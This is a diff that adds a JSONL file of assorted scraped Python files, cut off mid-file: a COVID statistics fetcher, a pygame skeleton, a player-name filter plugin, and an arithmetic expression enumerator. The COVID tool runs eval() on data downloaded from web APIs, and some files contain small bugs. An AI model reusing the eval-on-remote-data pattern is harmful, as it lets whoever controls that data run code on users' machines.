diff --git "a/4825.jsonl" "b/4825.jsonl" new file mode 100644--- /dev/null +++ "b/4825.jsonl" @@ -0,0 +1,589 @@ +{"seq_id":"451526626","text":"# StrNumMap\n# This class maps any string to a number, which can be reverse\n# looked up\n# i.e. \"sam\" -> 1, 1 -> \"sam\"\n# How to use:\n# Insert string into the map using insertStr, which returns\n# the corresponding num\n# Get a number from an inserted string, use insertStr\n# Get a string from a number, use getStr\n# Sam Mansfield\n\nclass StrNumMap:\n\n def __init__(self):\n self.string_dict = {}\n self.num_dict = {}\n self.num = 0\n \n # If the string is not in the map\n # inserts the string into the map and returns the\n # corresponding number\n # If the string is in the map\n # returns the corresponding number\n def insertStr(self, str):\n if str not in self.string_dict:\n self.string_dict[str] = self.num\n self.num_dict[self.num] = str\n self.num += 1\n return self.string_dict[str]\n\n # If the number is in the map\n # returns the corresponding string\n # If the number is not in the map\n # returns the string no mapping\n # NOTE: If the string \"num not in map\", where num corresponds\n # to the number entered is inserted into the map\n # there is no way to tell whether the string was returned\n # because it is not in the map or if that was the string returned\n def getStr(self, num):\n if num not in self.num_dict:\n return str(num) + \" not in map\" \n else:\n return self.num_dict[num]\n","sub_path":"strNumMap.py","file_name":"strNumMap.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"152341037","text":"# Start of the code\r\n\r\n\"\"\"Importing prerequisites \"\"\"\r\nimport requests # Module to open url\r\nfrom bs4 import BeautifulSoup as bs # Module to extract data from the url\r\nfrom time import sleep # To add delay to the code\r\nimport os # To access files in the computer\r\nfrom art import * # To add ascii art to the code\r\nfrom prettytable import PrettyTable # To print table from an dictionary\r\nimport lxml #To read lxml files\r\n\r\ndef Global_info():\r\n\r\n \"\"\"Function to Get global information \"\"\"\r\n\r\n def live_data():\r\n\r\n \"\"\" To get the live data from https://api.covid19api.com/summary \"\"\"\r\n\r\n global c_data\r\n global con_data\r\n\r\n try:\r\n #To Check the internet connection\r\n print('Trying to connect to network...'); sleep(2)\r\n api = 'https://api.covid19api.com/summary'\r\n req = requests.get(api).text\r\n raw_data = bs(req, 'lxml').text\r\n text = open(\"global_data.txt\",\"w\")\r\n text.write(raw_data)\r\n text.close()\r\n c_data = eval(open('global_data.txt').read())\r\n con_data = c_data['Countries']\r\n print('Connection... Successful...Proceeding...'); sleep(2)\r\n\r\n except:\r\n #When device is not connected to the internt\r\n print('Network Error...Trying with old data...'); sleep(3)\r\n\r\n try:\r\n #Trying to read data from the backup\r\n c_data = eval(open('global_data.txt').read())\r\n con_data = c_data['Countries']\r\n\r\n except:\r\n # When the data cannot retrived from the backup\r\n print('Cannot retrive the data...Connect to a Network and try again...'); sleep(1)\r\n tprint('\\nTHANK YOU \\n', font='Bold-small'); sleep(3) # Thank you text in ascii art\r\n os.remove('global_data.txt')#Deleting the unusable data\r\n exit()\r\n \r\n def quick_stats():\r\n\r\n \"\"\"Function to Get quick stats from global information \"\"\"\r\n\r\n gbl_val = c_data['Global']\r\n pt = PrettyTable()#Creating a table\r\n pt.field_names = gbl_val.keys()#Adding field names of the table\r\n pt.add_row(gbl_val.values())#Adding the values to the table\r\n print(pt)\r\n \r\n def data_by_code():\r\n\r\n \"\"\"Function to Get the data by entering country code from global information \"\"\"\r\n\r\n usr_code = input('Enter the Country code which you want the details: ').upper()\r\n\r\n try:\r\n for i in range(len(con_data)):\r\n if con_data[i]['CountryCode'] == usr_code:\r\n del con_data[i]['Slug']\r\n del con_data[i]['ID']\r\n del con_data[i]['Premium']\r\n for key, value in con_data[i].items():\r\n pt = PrettyTable()#Creating a table\r\n pt.field_names = con_data[i].keys()#Adding field names of the table\r\n pt.add_row(con_data[i].values())#Adding the values to the table\r\n print(pt)\r\n break\r\n break\r\n\r\n except:\r\n print('Country code does not exist or check the code...Try Again...')\r\n data_by_code()\r\n\r\n def data_by_con():\r\n\r\n \"\"\"Function to Get data by enter an country from global information \"\"\"\r\n\r\n con = input('Enter the Country which you want the details: ').capitalize()\r\n\r\n try:\r\n for i in range(len(con_data)):\r\n if con_data[i]['Country'] == con:\r\n del con_data[i]['Slug']\r\n del con_data[i]['ID']\r\n del con_data[i]['Premium']\r\n for key, value in con_data[i].items():\r\n pt = PrettyTable()#Creating a table\r\n pt.field_names = con_data[i].keys()#Adding field names of the table\r\n pt.add_row(con_data[i].values())#Adding the values to the table\r\n print(pt)\r\n break\r\n break\r\n\r\n except:\r\n print('Country does not exist or check the Spelling...Try Again...')\r\n data_by_con()\r\n \r\n def sub_Category():\r\n\r\n \"\"\"Function to access sub category from global information \"\"\"\r\n\r\n print('\\nSelect sub_Category...\\n')\r\n print('1. Quick Stats')\r\n print('2. Data by country code')\r\n print('3. Data by country')\r\n\r\n usr_global_option = int(input('\\nEnter the option: '))\r\n\r\n #Calling the functions according to user entered option\r\n\r\n while True:\r\n #When user selects option 1\r\n if usr_global_option == 1:\r\n quick_stats()\r\n break\r\n #When user selects option 2\r\n if usr_global_option == 2:\r\n data_by_code()\r\n break\r\n #When user selects option 3\r\n if usr_global_option == 3:\r\n data_by_con()\r\n break\r\n\r\n else:\r\n print('Select the correct option...Try Again...')\r\n\r\n #Calling nested functions of Global_Info()\r\n\r\n live_data()\r\n sub_Category() \r\n\r\ndef State_info():\r\n\r\n \"\"\"Function to get State information\"\"\"\r\n\r\n states = {'Andaman and Nicobar Islands': 'an', 'Andhra Pradesh': 'ap',\r\n 'Arunachal Pradesh': 'ar', 'Assam': 'as', 'Bihar': 'br',\r\n 'Chandigarh': 'ch', 'Chhattisgarh': 'ct', 'Dadar and Nagar Haveli': 'dn',\r\n 'Daman and Diu': 'dd', 'Delhi': 'dl', 'Goa': 'ga', 'Gujarat': 'gj', 'Haryana': 'hr',\r\n 'Himachal Pradesh': 'hp', 'Jammu and Kashmir': 'jk', 'Jharkhand': 'jh', 'Karnataka': 'ka',\r\n 'Kerala': 'kl', 'Lakshadweep': 'la', 'Madhya Pradesh': 'mp', 'Maharashtra': 'mh', 'Manipur': 'mn',\r\n 'Meghalaya': 'ml', 'Mizoram': 'mz', 'Nagaland': 'nl', 'Odisha': 'or', 'Puducherry': 'py', 'Punjab': 'pb',\r\n 'Rajasthan': 'rj', 'Sikkim': 'sk', 'Tamil Nadu': 'tn', 'Telangana': 'tg', 'Tripura': 'tr',\r\n 'Uttar Pradesh': 'up', 'Uttarakhand': 'ut', 'West Bengal': 'wb'}\r\n\r\n def live_data():\r\n\r\n \"\"\" To get the live data from https://api.covid19india.org/states_daily.json \"\"\"\r\n\r\n global s_data\r\n global state_data\r\n\r\n try:\r\n #To Check the internet connection\r\n print('Trying to connect to network...'); sleep(2)\r\n api = 'https://api.covid19india.org/states_daily.json'\r\n req = requests.get(api).text\r\n raw_data = bs(req, 'lxml').text\r\n text = open(\"state_data.txt\",\"w\")\r\n text.write(raw_data)\r\n text.close()\r\n s_data = eval(open('state_data.txt').read())\r\n state_data = s_data['states_daily'][-1]\r\n print('Connection... Successful...Proceeding...'); sleep(2)\r\n\r\n except:\r\n #When device is not connected to the internt\r\n print('Network Error...Trying with old data...'); sleep(3)\r\n\r\n try:\r\n #Trying to read data from the backup\r\n s_data = eval(open('state_data.txt').read())\r\n state_data = s_data['states_daily'][-1]\r\n\r\n except:\r\n # When the data cannot retrived from the backup\r\n print('Cannot retrive the data...Connect to a Network and try again...'); sleep(1)\r\n tprint('\\nTHANK YOU \\n', font='Bold-small'); sleep(3) # Thank you text in ascii art\r\n os.remove('state_data.txt')#Deleting the unusable data\r\n exit()\r\n\r\n def data_by_state():\r\n\r\n \"\"\"To get data by entering state from state information\"\"\"\r\n\r\n try:\r\n usr_state = input('Enter the state In India: ').title()\r\n try:\r\n print('\\nThere are {} cases in {}\\n'.format(state_data[usr_state.lower()], usr_state))\r\n except:\r\n state_val = states[usr_state]\r\n print('\\nThere are {} cases in {}\\n'.format(state_data[state_val], usr_state))\r\n\r\n except:\r\n print('State Does Not Exist or check the spelling ...Try Again...')\r\n data_by_state()\r\n\r\n #Calling nested functions of State_Info()\r\n \r\n live_data()\r\n data_by_state()\r\n \r\ndef mainloop():\r\n\r\n \"\"\"Function to control the flow of the code\"\"\"\r\n\r\n # To print the header of the project in ascii\r\n tprint('\\nPROJECT-COVID \\n', font='Bold-small')\r\n\r\n print('1. Global Information')\r\n print('2. Indian State Information')\r\n \r\n while True:\r\n usr_option = int(input('Enter the option: '))\r\n\r\n #To check wether the options are entered correctly\r\n if usr_option in (1, 2):\r\n break\r\n else:\r\n print('Select correct option...Try Again...\\n')\r\n \r\n #Calling the functions according to user entered option\r\n\r\n #When user selects option 1\r\n if usr_option == 1:\r\n tprint('GLOBAL INFORMATION \\n', font='small')# GLOBAL INFORMATION text in ascii art\r\n Global_info()\r\n #When user selects option 2\r\n if usr_option == 2:\r\n tprint('STATE INFORMATION \\n', font='small')# STATE INFORMATION text in ascii art\r\n State_info()\r\n \r\n # To ask the user to run the code again\r\n\r\n while True: \r\n loop = input('Do you want to run the program again (y/n)?')\r\n\r\n #When user wants to run the code again\r\n if loop == 'yes' or loop == 'y':\r\n #Calling the mainloop function to run again\r\n mainloop() \r\n\r\n #When user wants Quit the code\r\n elif loop == 'no' or loop == 'n':\r\n # Thank you text in ascii art\r\n tprint('\\nTHANK YOU \\n', font='Bold-small'); sleep(3)\r\n exit()\r\n\r\n#Calling mainloop function \r\nmainloop()\r\n\r\n# End of the code\r\n","sub_path":"Project COVID.py","file_name":"Project COVID.py","file_ext":"py","file_size_in_byte":9888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"268577761","text":"#nested functions\n\n# def outerFunction():\n# print(\"outer function\")\n# def innerFunction():\n# print(\"we are in inner function\")\n# return innerFunction\n#\n# inner=outerFunction()\n\n#inner()\n\n# def function1():\n# print(\"Hello world\")\n# def innerfn(y):\n# print(y*2)\n#\n# return innerfn\n#\n# x=function1()\n# x(5)\n\n#example 3\n# def add(x):\n# print(\"I'm here to add two numbers\")\n# x=x+5\n# print(x)\n# def multiply(y):\n#\n# y*=x\n#\n# print(y)\n# return multiply\n#\n# y=add(5)\n# y(5)\n\n#nested lambda\nxyz=lambda x,y:lambda z:x+y+z\nouter=xyz(3,4)\nprint(outer)\n\nprint(outer(5))\n\ndef outer(x,y):\n def inner(z):\n z=x+y+z\n return z\n return inner\n\nzyx=outer(3,4)\nprint(zyx)\na=zyx(5)\nprint(a)\n","sub_path":"NestedFns.py","file_name":"NestedFns.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"497190668","text":"#Imports\r\nimport pygame\r\nfrom playerclass import Player\r\nimport random\r\nimport settings\r\nimport os\r\n\r\nclass Game:\r\n def __init__(self):\r\n # Initialize game window\r\n pygame.init()\r\n pygame.mixer.init()\r\n self.screen = pygame.display.set_mode((settings.WIDTH, settings.HEIGHT))\r\n pygame.display.set_caption(\"My Game\")\r\n self.clock = pygame.time.Clock()\r\n self.load_data()\r\n self.running = True\r\n\r\n def load_data(self):\r\n game_folder = os.path.dirname(__file__)\r\n img_folder = os.path.join(game_folder, 'img')\r\n self.player_img = pygame.image.load(os.path.join(img_folder, settings.PLAYER_IMG)).convert_alpha()\r\n\r\n def check_bounds(self):\r\n if self.player_ship.rect.centerx > settings.WIDTH:\r\n self.player_ship.rect.centerx = 0\r\n if self.player_ship.rect.centery > settings.HEIGHT:\r\n self.player_ship.rect.centery = 0\r\n if self.player_ship.rect.centerx < 0:\r\n self.player_ship.rect.centerx = settings.WIDTH\r\n if self.player_ship.rect.centery < 0:\r\n self.player_ship.rect.centery = settings.HEIGHT\r\n\r\n def movement(self):\r\n keystate = pygame.key.get_pressed()\r\n if keystate[pygame.K_w]:\r\n self.player_ship.moveUp()\r\n if keystate[pygame.K_s]:\r\n self.player_ship.moveDown()\r\n if keystate[pygame.K_d]:\r\n self.player_ship.moveLeft()\r\n if keystate[pygame.K_a]:\r\n self.player_ship.moveRight()\r\n self.check_bounds()\r\n\r\n def new(self):\r\n # Start a New Game\r\n self.all_sprites = pygame.sprite.Group()\r\n self.player_ship = Player(self, 50, settings.HEIGHT / 2)\r\n self.all_sprites.add(self.player_ship)\r\n self.run()\r\n\r\n def run(self):\r\n # Game loop\r\n self.playing = True\r\n while self.playing:\r\n self.clock.tick(settings.FPS)\r\n self.events()\r\n self.update()\r\n self.draw()\r\n\r\n\r\n def update(self):\r\n # Game loop - Update\r\n self.all_sprites.update()\r\n\r\n def events(self):\r\n # Game loop - Events\r\n for event in pygame.event.get():\r\n # Check for closing the window\r\n if event.type == pygame.QUIT:\r\n self.playing = False\r\n self.running = False\r\n self.movement()\r\n\r\n def draw(self):\r\n # Game loop - Draw\r\n self.screen.fill(settings.BLUE)\r\n self.all_sprites.draw(self.screen)\r\n # *after* drawing everything, flip the display\r\n pygame.display.flip()\r\n\r\n def show_start_screen(self):\r\n # Game splash/start screen\r\n pass\r\n\r\n def show_go_screen(self):\r\n # Game over/continue\r\n pass\r\n\r\n\r\n\r\ndef main():\r\n g = Game()\r\n g.show_start_screen()\r\n while g.running:\r\n g.new()\r\n g.show_go_screen()\r\n\r\nmain()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"131400317","text":"# coding=utf-8\n__author__ = 'DreTaX'\n__version__ = '1.0'\n\nimport clr\n\nclr.AddReferenceByPartialName(\"Pluton\")\nimport Pluton\nimport re\n\"\"\"\n Class\n\"\"\"\n\n\nclass IllegalName:\n\n def getIllegal(self):\n if not Plugin.IniExists(\"IllegalNames\"):\n IllegalNames = Plugin.CreateIni(\"IllegalNames\")\n IllegalNames.AddSetting(\"IllegalNames\", \"Name1\", \"Suck\")\n IllegalNames.AddSetting(\"IllegalNames\", \"Name2\", \"Fuck\")\n IllegalNames.AddSetting(\"IllegalNames\", \"Name3\", \"SHITSERVER\")\n IllegalNames.Save()\n return Plugin.GetIni(\"IllegalNames\")\n\n def IllegalNameConfig(self):\n if not Plugin.IniExists(\"IllegalNameConfig\"):\n loc = Plugin.CreateIni(\"IllegalNameConfig\")\n loc.Save()\n return Plugin.GetIni(\"IllegalNameConfig\")\n\n def CutName(self, string):\n name = re.sub(r'[^\\x00-\\x7F]+','', string)\n return name\n\n def Replace(self, Old, To, Text):\n return re.sub('(?i)'+re.escape(Old), lambda m: To, Text)\n\n def On_ClientAuth(self, AuthEvent):\n name = AuthEvent.Connection.username\n ini = self.IllegalNameConfig()\n asciie = int(ini.GetSetting(\"options\", \"CheckForNonAscii\"))\n regex = int(ini.GetSetting(\"options\", \"CheckWithRegEx\"))\n illini = self.getIllegal()\n listnames = illini.EnumSection(\"IllegalNames\")\n for checkn in listnames:\n get = illini.GetSetting(\"IllegalNames\", checkn)\n name = self.Replace(get, '', name)\n if regex == 1:\n name = re.sub(' +',' ', name)\n name = re.sub('[\\t]+','', name)\n starts = name.startswith(' ')\n ends = name.endswith(' ')\n if starts is True:\n name.replace(name[0], '')\n if ends is True:\n n = len(name)\n name.replace(name[n-1], '')\n a = re.match('^[a-zA-Z0-9_!+?%éáűőúöüó()<>/\\@#,.\\\\s\\[\\]-]+$', name)\n n = len(name)\n if not a or n <= 1:\n name = re.sub('^[a-zA-Z0-9_!+?%éáűőúöüó()<>/\\@#,.\\\\s\\[\\]-]+$', \"\", name)\n if asciie == 1:\n newname = self.CutName(name)\n name = newname\n AuthEvent.con.username = str(name)","sub_path":"PlutonPlugins/IllegalName/IllegalName.py","file_name":"IllegalName.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"405552157","text":"from dataclasses import dataclass\nfrom typing import Dict\n\nfrom exporter.terra.exceptions import ExperimentMessageParseException\n\n\n@dataclass\nclass ExperimentMessage:\n process_id: str\n process_uuid: str\n submission_uuid: str\n experiment_index: int\n total: int\n job_id: str\n\n @staticmethod\n def from_dict(data: Dict) -> 'ExperimentMessage':\n try:\n return ExperimentMessage(data[\"documentId\"],\n data[\"documentUuid\"],\n data[\"envelopeUuid\"],\n data[\"index\"],\n data[\"total\"],\n data[\"exportJobId\"])\n except (KeyError, TypeError) as e:\n raise ExperimentMessageParseException(e)\n","sub_path":"exporter/terra/experiment/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"563280218","text":"'''\nCreated on May 16, 2017\n\n@author: savvas@purdue.edu\n'''\n\nfrom collections import OrderedDict\nimport itertools\nimport operator\nimport os\n\nfrom arithmetic_evaluator import eval_expr\n\n# the operators to consider\nOPERATORS = ['+', '-', '*', '/', '**']\nOPERATOR_PRECEDENCE = {'**':3, '*':4, '/':4, '+':5, '-':5}\n\n# added terms\nUNARY_OPERATORS = []\n# UNARY_OPERATORS = ['sqrt', 'factorial']\n\n# the digit to use to represent number\nDIGIT = 1\n\n# max number of instances of the DIGIT to use\nMAX_DIGITS = 10\n\n# Ignore results outside the following limits\nRECORD_FROM = 0\nRECORD_TO = 1000000\n\n\ndef operandCombinations(digits):\n \"\"\"\n Returns a list of lists with all allowed combinations of the used DIGITS.\n \n e.g. for digits = [1, 2, 3] return\n [\n [1, 2, 3], [1, 2, -3], [1, -2, 3], [1, -2, -3], [1, 23], [1, -23], \n [-1, 2, 3], [-1, 2, -3], [-1, -2, 3], [-1, -2, -3], [-1, 23], [-1, -23],\n [12, 3], [12, -3], [-12, 3], [-12, -3],\n [123], [-123]\n ]\n \"\"\"\n # if there are no more digits to use, return an empty list\n if(len(digits) == 0):\n return [[]]\n \n # if there is only 1 digit left to use, return both the positive and negative value of the \n # digits as two lists.\n if(len(digits) == 1):\n return [[digits[0]], [-digits[0]]]\n\n result = []\n \n # construct all possible lengths of consecutive digit sequences\n # e.g for digits ['1', '2', '3'] construct '1', '12', '123'\n for sequenceLength in range(len(digits)):\n \n digit = digits[0]\n for index in range(sequenceLength):\n # append next digit\n digit = int(str(digit) + str(digits[index + 1]))\n\n # recursively construct all combinations for smaller lists\n sublist = operandCombinations(digits[sequenceLength + 1:])\n result += [[digit] + s for s in sublist] + [[-digit] + s for s in sublist]\n \n return result\n\n\ndef operatorCombinations(operatorList, length):\n \"\"\"\n Returns a list of lists with all combinations of operands of the given length.\n \n e.g. for operatorList = ['+', '-', '*'] and length = 3 return\n [\n ['+', '+', '+'], ['+', '+', '-'], ['+', '+', '*'], \n ['+', '-', '+'], ['+', '-', '-'], ['+', '-', '*'], \n ['+', '*', '+'], ['+', '*', '-'], ['+', '*', '*'], \n ['-', '+', '+'], ['-', '+', '-'], ['-', '+', '*'], \n ['-', '-', '+'], ['-', '-', '-'], ['-', '-', '*'], \n ['-', '*', '+'], ['-', '*', '-'], ['-', '*', '*'], \n ['*', '+', '+'], ['*', '+', '-'], ['*', '+', '*'], \n ['*', '-', '+'], ['*', '-', '-'], ['*', '-', '*'], \n ['*', '*', '+'], ['*', '*', '-'], ['*', '*', '*']\n ]\n \"\"\"\n l = []\n for subset in itertools.product(operatorList, repeat=length):\n l += [list(subset)]\n \n return l\n\n\ndef unaryCombinations(token):\n l = []\n for uop in UNARY_OPERATORS:\n # construct the subexpression\n s = uop + \"(\" + token + \")\"\n \n # confirm subexpression is valid, e.g. factorial(-5) will fail\n succeeded = True\n try:\n eval_expr(s)\n except ValueError:\n succeeded = False\n \n if succeeded:\n l.append(s)\n \n return l\n\n\ndef highestPrecedence(operators):\n precedence = -1\n for op in operators:\n if OPERATOR_PRECEDENCE[op] > precedence:\n precedence = OPERATOR_PRECEDENCE[op]\n return precedence\n\n\ndef expressionCombinations2(operandList, operatorList, opBefore=''):\n # number of operators must be exactly one less than operands, since all operations are binary\n if len(operandList) != len(operatorList) + 1:\n raise ValueError(\"Incorrect length of operator list\")\n \n # Base 1: if no operators, return the remaining operand plus unary operations on that operand\n if len(operatorList) == 0:\n first_subexpression = str(operandList[0])\n l = [first_subexpression] + unaryCombinations(first_subexpression)\n return l, [-1 * len(l)]\n \n # Base 2: if only 1 operator remains, construct and return the resulting 2 operand first_subexpression\n if(len(operatorList) == 1):\n first_subexpression = str(operandList[0]) + operatorList[0] + str(operandList[1])\n \n # add it to the list of subexpressions to return\n l = []\n l.append(first_subexpression)\n \n # add unary operations\n l = l + unaryCombinations(first_subexpression)\n \n return l, [OPERATOR_PRECEDENCE[operatorList[0]] * len(l)]\n \n # general case: construct expressions in two parts both recursively constructed\n expressions = []\n highest_precedence_list = []\n for sequenceLength in range(len(operatorList)):\n \n # recursively construct list of subexpressions that come after the first sub expression\n operands_first = operandList[:sequenceLength + 1]\n operators_first = operatorList[:sequenceLength]\n # highest_precedence_first = highestPrecedence(operators_first)\n first_subexpression_list, highest_precedence_first = expressionCombinations2(operands_first, operators_first)\n connecting_op = operatorList[sequenceLength]\n operands_second = operandList[sequenceLength + 1:]\n operators_second = operatorList[sequenceLength + 1:]\n # highest_precedence_second = highestPrecedence(operators_second)\n second_subexpression_list, highest_precedence_second = expressionCombinations2(operands_second, operators_second, connecting_op)\n \n # combine the two parts\n for se1, he1 in zip(first_subexpression_list, highest_precedence_first):\n for se2, he2 in zip(second_subexpression_list, highest_precedence_second):\n \n l1 = [se1]\n h1_list = [he1]\n if opBefore != '' and OPERATOR_PRECEDENCE[opBefore] < he1:\n l1.append('(' + se1 + ')')\n h1_list.append(-1)\n elif OPERATOR_PRECEDENCE[connecting_op] < he1:\n l1.append('(' + se1 + ')')\n h1_list.append(-1)\n elif opBefore == '-' and he1 == 5:\n l1.append('(' + se1 + ')')\n h1_list.append(-1)\n \n l2 = [se2]\n h2_list = [he2]\n if OPERATOR_PRECEDENCE[connecting_op] < he2:\n l2.append('(' + se2 + ')')\n h2_list.append(-1)\n elif connecting_op == '-' and he2 == 5:\n l2.append('(' + se2 + ')')\n h2_list.append(-1)\n \n for s1, h1 in zip(l1, h1_list):\n for s2, h2 in zip(l2, h2_list):\n e = s1 + connecting_op + s2\n h = max(h1, h2, OPERATOR_PRECEDENCE[connecting_op])\n if e not in expressions:\n expressions.append(e)\n highest_precedence_list.append(h)\n \n return expressions, highest_precedence_list\n\n \n\"\"\"\nReturns a list of expressions with all combinations of parentheses applied to the given operand and \noperator lists.\n\ne.g. for operands [2, 3, 4, 5, 6] and operators ['*', '-', '*', '+'] return\n\n['\n 2*3-4*5+6', '2*3-4*(5+6)', '2*3-(4*5+6)', '2*3-(4*(5+6))', \n '2*(3-4)*5+6', '2*(3-4)*(5+6)', '2*(3-4*5+6)', '2*(3-4*(5+6))', \n '2*(3-4*5)+6', '(2*3-4)*5+6', '(2*3-4)*(5+6)'\n]\n\n\"\"\"\n\n\ndef expressionCombinations(operandList, operatorList, opBefore=''):\n \n # number of operators must be exactly one less than operands\n if len(operandList) != len(operatorList) + 1:\n raise ValueError(\"Incorrect length of operator list\")\n \n # if no operators, return the remaining operand\n if len(operatorList) == 0:\n x = [str(operandList[0])]\n \n for uop in UNARY_OPERATORS:\n # construct the subexpression\n s = uop + \"(\" + str(operandList[0]) + \")\"\n \n # confirm subexpression is valid, e.g. factorial(-5) will fail\n succeeded = True\n try:\n eval_expr(s)\n except ValueError:\n succeeded = False\n \n if succeeded:\n x.append(s)\n \n return x\n \n # if only 1 operator remains, construct and return the expression\n if(len(operatorList) == 1):\n result = []\n result.append(str(operandList[0]) + operatorList[0] + str(operandList[1]))\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + str(operandList[0]) + operatorList[0] + str(operandList[1]) + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n \n if succeeded:\n result.append(sq)\n \n if opBefore != '' and OPERATOR_PRECEDENCE[operatorList[0]] > OPERATOR_PRECEDENCE[opBefore]:\n result.append(\"(\" + str(operandList[0]) + operatorList[0] + str(operandList[1]) + \")\")\n return result \n \n result = []\n \n # construct all possible lengths of expressions\n for sequenceLength in range(len(operatorList)):\n \n largestPrecedence = -1\n \n subexpression = str(operandList[0])\n op = operatorList[0]\n for index in range(sequenceLength):\n subexpression += operatorList[index] + str(operandList[index + 1])\n op = operatorList[index + 1]\n \n if OPERATOR_PRECEDENCE[operatorList[index]] > largestPrecedence:\n largestPrecedence = OPERATOR_PRECEDENCE[operatorList[index]]\n \n sublist = expressionCombinations(operandList[sequenceLength + 1:], operatorList[sequenceLength + 1:], op)\n \n result += [subexpression + op + s for s in sublist]\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + subexpression + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n if succeeded:\n result += [sq + op + s for s in sublist]\n \n if (OPERATOR_PRECEDENCE[op] < largestPrecedence or \n (opBefore in OPERATOR_PRECEDENCE and OPERATOR_PRECEDENCE[opBefore] < largestPrecedence)):\n result += [\"(\" + subexpression + \")\" + op + s for s in sublist]\n \n if opBefore != '':\n result += [\"(\" + subexpression + op + s + \")\" for s in sublist]\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + subexpression + op + s + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n if succeeded:\n result += [sq + op + s for s in sublist]\n \n if opBefore == '-' and ('-' in subexpression + op + s or '+' in subexpression + op + s):\n result += [\"(\" + subexpression + op + s + \")\" for s in sublist]\n \n for uop in UNARY_OPERATORS:\n sq = uop + \"(\" + subexpression + op + s + \")\"\n succeeded = True\n try:\n eval_expr(sq)\n except ValueError:\n succeeded = False\n if succeeded:\n result += [sq + op + s for s in sublist]\n \n return list(OrderedDict.fromkeys(result))\n # return result\n\n\nRESULT = {}\nCOUNT = 0\nNEXT_IN_SERIES = RECORD_FROM\n\n\ndef evalExpressions(expressionList):\n \"\"\"\n Evaluate expressions\n \"\"\"\n global RESULT\n global COUNT\n global NEXT_IN_SERIES\n \n # remove obsolete expressions\n expressionList = filter(lambda a: \"--\" not in a, expressionList)\n # expressionList = filter(lambda a: \"-(-\" not in a, expressionList)\n expressionList = filter(lambda a: \"+-\" not in a, expressionList)\n # expressionList = filter(lambda a: \"+(-\" not in a, expressionList)\n \n for expression in expressionList:\n \n COUNT += 1\n # if COUNT % 100000 == 0:\n # print \"Evaluated \" + str(COUNT) + \" expressions\"\n \n # print expression \n try:\n result = float(eval_expr(expression))\n except Exception:\n continue\n \n # print \"BEFORE= \" + expression + \" = \" + str(result)\n \n if isinstance(result, float):\n if not result.is_integer():\n continue\n \n x = int(result)\n result = x\n \n if result < RECORD_FROM:\n continue\n \n if result > RECORD_TO:\n continue\n \n if result < NEXT_IN_SERIES:\n continue\n \n if result == NEXT_IN_SERIES:\n NEXT_IN_SERIES += 1\n \n if result not in RESULT:\n RESULT[result] = expression\n \n # print \"AFTER= \" + expression + \" = \" + str(result)\n \n # return result\n\n\ndef execute():\n global RESULT\n global NEXT_IN_SERIES\n \n for number_of_digits in range(MAX_DIGITS):\n digits = [DIGIT] * (number_of_digits + 1)\n operandComb = operandCombinations(digits)\n \n print (digits)\n print(len(operandComb))\n for operandListIndex in range(len(operandComb)):\n operandList = operandComb[operandListIndex]\n operatorComb = operatorCombinations(OPERATORS, len(operandList) - 1)\n \n if len(operatorComb) == 0:\n expressionList = expressionCombinations2(operandList, [])[0]\n evalExpressions(expressionList)\n else:\n for operatorListIndex in range(len(operatorComb)):\n operatorList = operatorComb[operatorListIndex]\n expressionList = expressionCombinations2(operandList, operatorList)[0]\n evalExpressions(expressionList)\n \n print (\"Completed: \" + str(operandListIndex) + \" = \" + str(operandList))\n \n if (operandListIndex != 0 and operandListIndex % 10 == 0) or operandListIndex == len(operandComb) - 1:\n\n for i in range(10):\n try:\n with open(str(DIGIT) + \"_INDEX\" + str(operandListIndex - 10 + i) + \".txt\", \"r\") as expressionCombinations:\n for line in expressionCombinations:\n r = line.split()\n if int(r[0]) not in RESULT:\n RESULT[int(r[0])] = r[1]\n \n # remove previous file\n try:\n os.remove(str(DIGIT) + \"_INDEX\" + str(operandListIndex - 10 + i) + \".txt\")\n print (\"deleting \" + str(DIGIT) + \"_INDEX\" + str(operandListIndex - 10 + i) + \".txt\")\n except OSError:\n pass\n \n except Exception:\n pass\n \n if operandListIndex == len(operandComb) - 1:\n sorted_x = sorted(RESULT.items(), key=operator.itemgetter(0))\n next_in = RECORD_FROM\n with open(str(DIGIT) + \"_FINAL\" + str(number_of_digits + 1) + \".txt\", \"w\") as expressionCombinations:\n for item in sorted_x:\n expressionCombinations.write(\"%s\\t%s\\n\" % (item[0], item[1]))\n if item[0] == next_in:\n next_in += 1\n \n try:\n with open(str(DIGIT) + \"_CUMMULATIVE.txt\", \"r\") as expressionCombinations:\n for line in expressionCombinations:\n r = line.split()\n RESULT[int(r[0])] = r[1]\n except Exception:\n pass\n \n sorted_x = sorted(RESULT.items(), key=operator.itemgetter(0))\n next_in = RECORD_FROM\n with open(str(DIGIT) + \"_CUMMULATIVE.txt\", \"w\") as expressionCombinations:\n for item in sorted_x:\n expressionCombinations.write(\"%s\\t%s\\n\" % (item[0], item[1]))\n if item[0] == next_in:\n next_in += 1\n \n else: \n sorted_x = sorted(RESULT.items(), key=operator.itemgetter(0))\n next_in = RECORD_FROM\n with open(str(DIGIT) + \"_INDEX\" + str(operandListIndex) + \".txt\", \"w\") as expressionCombinations:\n for item in sorted_x:\n expressionCombinations.write(\"%s\\t%s\\n\" % (item[0], item[1]))\n if item[0] == next_in:\n next_in += 1\n \n if next_in > NEXT_IN_SERIES:\n NEXT_IN_SERIES = next_in\n \n # re-init results\n RESULT = {}\n \n \nif __name__ == 